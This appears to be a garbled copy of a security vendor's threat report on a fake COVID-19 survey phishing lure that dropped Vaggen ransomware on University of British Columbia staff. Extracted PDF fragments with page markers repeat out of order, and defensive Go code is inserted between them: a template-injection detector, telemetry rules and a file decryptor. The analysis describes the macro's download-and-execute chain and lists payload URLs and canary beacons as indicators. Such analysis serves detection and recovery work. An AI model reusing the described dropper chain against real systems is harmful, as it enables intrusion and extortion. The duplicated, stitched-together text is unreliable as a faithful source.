warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2516 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2517 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2518 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2519 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2520 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2521 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2522 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2523 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself carries no macro, so macro-based scanning of the attachment alone finds nothing; the malicious code only arrives when Word fetches the remote template on open.
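A triage check for this technique, added here as an example and not code from the original post: a .docx is a ZIP package, and an attached template is declared as an attachedTemplate relationship (normally in word/_rels/settings.xml.rels) whose TargetMode is External. The scanner below parses every .rels part and reports attachedTemplate targets that are http(s) URLs. The two fixtures are constructed for the example; the host example.invalid is a placeholder, not the template URL used in the attack. A document attached to a local file:/// template such as Normal.dotm is ordinary and is deliberately not flagged.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// attachedTemplateType is the OOXML relationship type Word uses for the
// template a document is attached to.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// relationships mirrors a .rels part: <Relationships> holding <Relationship>
// elements with Id, Type, Target and TargetMode attributes.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// remoteTemplates opens a .docx (a ZIP package) and returns the Target of
// every attachedTemplate relationship that points at an http(s) URL. Word
// fetches such a template when the document opens and runs its macros, which
// is the template injection used by the UBC lure.
func remoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, err
	}
	var found []string
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		raw, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(raw, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			target := strings.ToLower(r.Target)
			if r.Type == attachedTemplateType && r.TargetMode == "External" &&
				(strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")) {
				found = append(found, r.Target)
			}
		}
	}
	return found, nil
}

// buildDocx assembles a minimal constructed .docx in memory around the given
// settings.xml.rels relationships. It is a fixture for this example, not the lure.
func buildDocx(settingsRels string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	parts := map[string]string{
		"[Content_Types].xml":          `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/settings.xml":            `<?xml version="1.0" encoding="UTF-8"?><w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>`,
		"word/_rels/settings.xml.rels": `<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` + settingsRels + `</Relationships>`,
	}
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}

// injectedDocx mimics the lure; the host is a placeholder, not the real URL.
func injectedDocx() []byte {
	return buildDocx(`<Relationship Id="rId1" Type="` + attachedTemplateType +
		`" Target="https://example.invalid/template.dotm" TargetMode="External"/>`)
}

// cleanDocx is attached to a local template, as an ordinary document would be.
func cleanDocx() []byte {
	return buildDocx(`<Relationship Id="rId1" Type="` + attachedTemplateType +
		`" Target="file:///C:/Users/staff/AppData/Roaming/Microsoft/Templates/Normal.dotm" TargetMode="External"/>`)
}

func main() {
	for _, doc := range []struct {
		name string
		data []byte
	}{{"injected", injectedDocx()}, {"clean", cleanDocx()}} {
		targets, err := remoteTemplates(doc.data)
		fmt.Printf("%s: remote templates=%v err=%v\n", doc.name, targets, err)
	}
}
```

The check is worth running on every Office package that crosses a mail or file-sharing boundary, not only on files that contain VBA: the lure in this campaign was a plain .docx, and the macro lived in the .dotm it pulled from notabug.org.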
The remote template (template.dotm) was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started process)
If successful, sends an HTTP GET request to canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, sends an HTTP GET request to canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event. This can be very useful as an early warning system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from. Because the macro picks one of two canary URLs depending on whether Shell succeeded, the two tokens also tell the attacker whether the payload actually launched, not just whether the document was opened.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. From their behaviour, three of them map to:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback (WalkFunc) passed to the standard Go library function path/filepath.Walk, which visits every file below the starting directory.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
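Putting the scheme together (the hardcoded key, the 12-byte nonce, the ciphertext and the 16-byte GCM tag, as laid out in the paragraphs that follow), here is a decryptor for .VAGGEN files, added as an example; it is not code from the post or from the sample. encryptLikeVaggen is a fixture written from the post's description so the example runs offline, with crypto/rand standing in for CryptGenRandom. The file layout and key come from the analysis; the file-name handling (strip the .VAGGEN suffix, leave the encrypted copy in place) is my own choice for a recovery tool.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// vaggenKey is the 32-byte AES-256 key recovered from the sample.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // standard GCM nonce; the sample fills it from CryptGenRandom
	tagSize   = 16 // authentication tag that gcm.Seal appends to the ciphertext
	extension = ".VAGGEN"
)

// newGCM builds the AEAD the way the sample does: AES-256 under the
// hardcoded key, GCM with a 12-byte nonce.
func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher([]byte(vaggenKey))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// decryptVaggen reverses the on-disk layout nonce || ciphertext || tag. The
// nonce is stored in clear and the key is hardcoded, so no secret is needed.
// gcm.Open verifies the tag first, so a truncated or tampered file, or one
// produced with another key, fails here instead of yielding garbage.
func decryptVaggen(blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("vaggen: file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// encryptLikeVaggen is a test fixture for this example, written from the
// blog's description (random nonce, gcm.Seal, nonce prepended); it is not the
// malware's code.
func encryptLikeVaggen(plain []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag after the nonce: the .VAGGEN layout.
	return gcm.Seal(nonce, nonce, plain, nil), nil
}

// restoredName strips the ransomware extension; ok is false for files that
// do not carry it, so a caller never overwrites an unrelated file.
func restoredName(name string) (string, bool) {
	if !strings.HasSuffix(name, extension) {
		return "", false
	}
	return strings.TrimSuffix(name, extension), true
}

// recoverFile decrypts path and writes the original next to it. The encrypted
// copy is left in place so a failed run loses nothing.
func recoverFile(path string) error {
	out, ok := restoredName(path)
	if !ok {
		return fmt.Errorf("%s: not a %s file", path, extension)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	plain, err := decryptVaggen(blob)
	if err != nil {
		return fmt.Errorf("%s: %w", path, err)
	}
	return os.WriteFile(out, plain, 0o600)
}

func main() {
	// Constructed sample content; in practice the input is a real .VAGGEN file.
	blob, err := encryptLikeVaggen([]byte("constructed sample document"))
	if err != nil {
		panic(err)
	}
	plain, err := decryptVaggen(blob)
	fmt.Printf("%d-byte blob -> %q (err=%v)\n", len(blob), plain, err)
}
```

Because GCM authenticates the ciphertext, a failure from Open is itself useful evidence: it means the file was not written by this key and layout, or was truncated afterwards. The tool never writes a wrong plaintext over anything.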
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2531 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2532 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2533 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs
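The macro chain described above (Word writes Polisen.exe and Killar.exe into %APPDATA%\Byxor, launches the dropped binary via Shell, then beacons to canarytokens.com) gives a defender three observable behaviours. The Go program below is an added example, not code from the post or from Malwarebytes: it runs one matching rule per behaviour over a handful of constructed endpoint telemetry lines (the "key=value | key=value" line format, the field names and the sample paths are assumptions made for this example).

```go
package main

import (
	"fmt"
	"strings"
)

// Finding is one telemetry line matched by a rule derived from the macro chain.
type Finding struct {
	Rule string
	Line string
}

// SampleTelemetry is constructed for this example. Fields are "key=value"
// separated by " | " so that paths containing spaces survive parsing.
// The first two lines are benign; the last four mirror the macro's steps.
var SampleTelemetry = []string{
	`type=process_create | parent=C:\Windows\explorer.exe | target=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`,
	`type=file_create | image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | target=C:\Users\alice\Documents\notes.docx`,
	`type=file_create | image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | target=C:\Users\alice\AppData\Roaming\Byxor\Polisen.exe`,
	`type=file_create | image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | target=C:\Users\alice\AppData\Roaming\Byxor\Killar.exe`,
	`type=process_create | parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | target=C:\Users\alice\AppData\Roaming\Byxor\Killar.exe`,
	`type=http | image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | url=http://canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp`,
}

// parseEvent turns one telemetry line into a map with lower-cased values,
// so path and host comparisons are case-insensitive as on Windows.
func parseEvent(line string) map[string]string {
	ev := make(map[string]string)
	for _, field := range strings.Split(line, " | ") {
		i := strings.Index(field, "=")
		if i < 0 {
			continue
		}
		ev[strings.TrimSpace(field[:i])] = strings.ToLower(strings.TrimSpace(field[i+1:]))
	}
	return ev
}

func isWord(path string) bool { return strings.HasSuffix(path, `\winword.exe`) }

// inByxor reports whether a path sits under the %APPDATA%\Byxor directory the macro creates.
func inByxor(path string) bool { return strings.Contains(path, `\appdata\roaming\byxor\`) }

// hostOf extracts the host part of a URL (scheme stripped, cut at the first slash).
func hostOf(rawURL string) string {
	rest := strings.TrimPrefix(strings.TrimPrefix(rawURL, "https://"), "http://")
	if i := strings.Index(rest, "/"); i >= 0 {
		rest = rest[:i]
	}
	return rest
}

// ClassifyEvent returns the name of the rule matching ev, or "" for a benign event.
func ClassifyEvent(ev map[string]string) string {
	switch ev["type"] {
	case "file_create":
		// The macro's download steps: Word itself writes an executable into %APPDATA%\Byxor.
		if isWord(ev["image"]) && inByxor(ev["target"]) && strings.HasSuffix(ev["target"], ".exe") {
			return "office_writes_exe_to_byxor"
		}
	case "process_create":
		// The Shell call makes WINWORD.EXE the parent of the dropped binary.
		if isWord(ev["parent"]) && inByxor(ev["target"]) {
			return "office_spawns_from_byxor"
		}
	case "http":
		// The success/failure beacon is a GET from the Office process to canarytokens.com.
		if isWord(ev["image"]) && hostOf(ev["url"]) == "canarytokens.com" {
			return "office_canarytoken_beacon"
		}
	}
	return ""
}

// ScanLog applies ClassifyEvent to every line and keeps the matches in order.
func ScanLog(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		if rule := ClassifyEvent(parseEvent(line)); rule != "" {
			out = append(out, Finding{Rule: rule, Line: line})
		}
	}
	return out
}

func main() {
	for _, f := range ScanLog(SampleTelemetry) {
		fmt.Printf("%-28s %s\n", f.Rule, f.Line)
	}
}
```

The Byxor path and the file names are specific to this campaign; the parent-child relation (an Office process spawning an executable from a user-writable directory) is the part worth keeping as a general rule.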
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2536 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. 
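The recovery follows directly from the .VAGGEN layout the post describes: strip the leading 12-byte nonce, hand the remaining ciphertext-plus-tag to GCM under the hardcoded key, and let GCM's tag check decide whether the key matched. The Go program below is an added example, not the post's or Malwarebytes' tool; it assumes the layout quoted above (nonce || ciphertext || 16-byte tag, no additional authenticated data) and the appended-extension naming, and it builds its own sample blob offline instead of touching a real encrypted file.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
	"os"
	"strings"
)

const (
	vaggenNonceSize = 12 // leading nonce; the sample draws it from CryptGenRandom
	vaggenTagSize   = 16 // trailing GCM tag appended by gcm.Seal
	vaggenExt       = ".VAGGEN"
)

// VaggenKey is the 32-byte AES-256 key hardcoded in the sample, as quoted in the post.
var VaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// newGCM builds the AEAD with Go's defaults (12-byte nonce, 16-byte tag),
// which is exactly what the described file layout requires.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen recovers the plaintext of one .VAGGEN file body.
// A wrong key or any corruption makes gcm.Open fail its tag check, so the
// function never returns garbage: it is a safe key probe as well as a decryptor.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < vaggenNonceSize+vaggenTagSize {
		return nil, errors.New("blob too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, ctAndTag := blob[:vaggenNonceSize], blob[vaggenNonceSize:]
	pt, err := gcm.Open(nil, nonce, ctAndTag, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or damaged file): %w", err)
	}
	return pt, nil
}

// SealVaggen produces a blob in the same nonce||ciphertext||tag layout. It exists
// only to construct an offline test fixture; the caller supplies the nonce.
func SealVaggen(key, nonce, plaintext []byte) ([]byte, error) {
	if len(nonce) != vaggenNonceSize {
		return nil, errors.New("nonce must be 12 bytes")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	// Seal appends ciphertext and tag to dst; starting dst with a copy of the
	// nonce yields exactly the on-disk layout described in the post.
	return gcm.Seal(append([]byte(nil), nonce...), nonce, plaintext, nil), nil
}

// RecoverFile decrypts path (which must end in .VAGGEN) and writes the original
// file name next to it, leaving the encrypted copy in place as evidence.
func RecoverFile(path string) (string, error) {
	if !strings.HasSuffix(path, vaggenExt) {
		return "", fmt.Errorf("%s does not carry the %s extension", path, vaggenExt)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	pt, err := DecryptVaggen(VaggenKey, blob)
	if err != nil {
		return "", err
	}
	out := strings.TrimSuffix(path, vaggenExt)
	if err := os.WriteFile(out, pt, 0o600); err != nil {
		return "", err
	}
	return out, nil
}

func main() {
	for _, p := range os.Args[1:] {
		if out, err := RecoverFile(p); err != nil {
			fmt.Fprintf(os.Stderr, "%s: %v\n", p, err)
		} else {
			fmt.Printf("%s -> %s\n", p, out)
		}
	}
}
```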
It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected 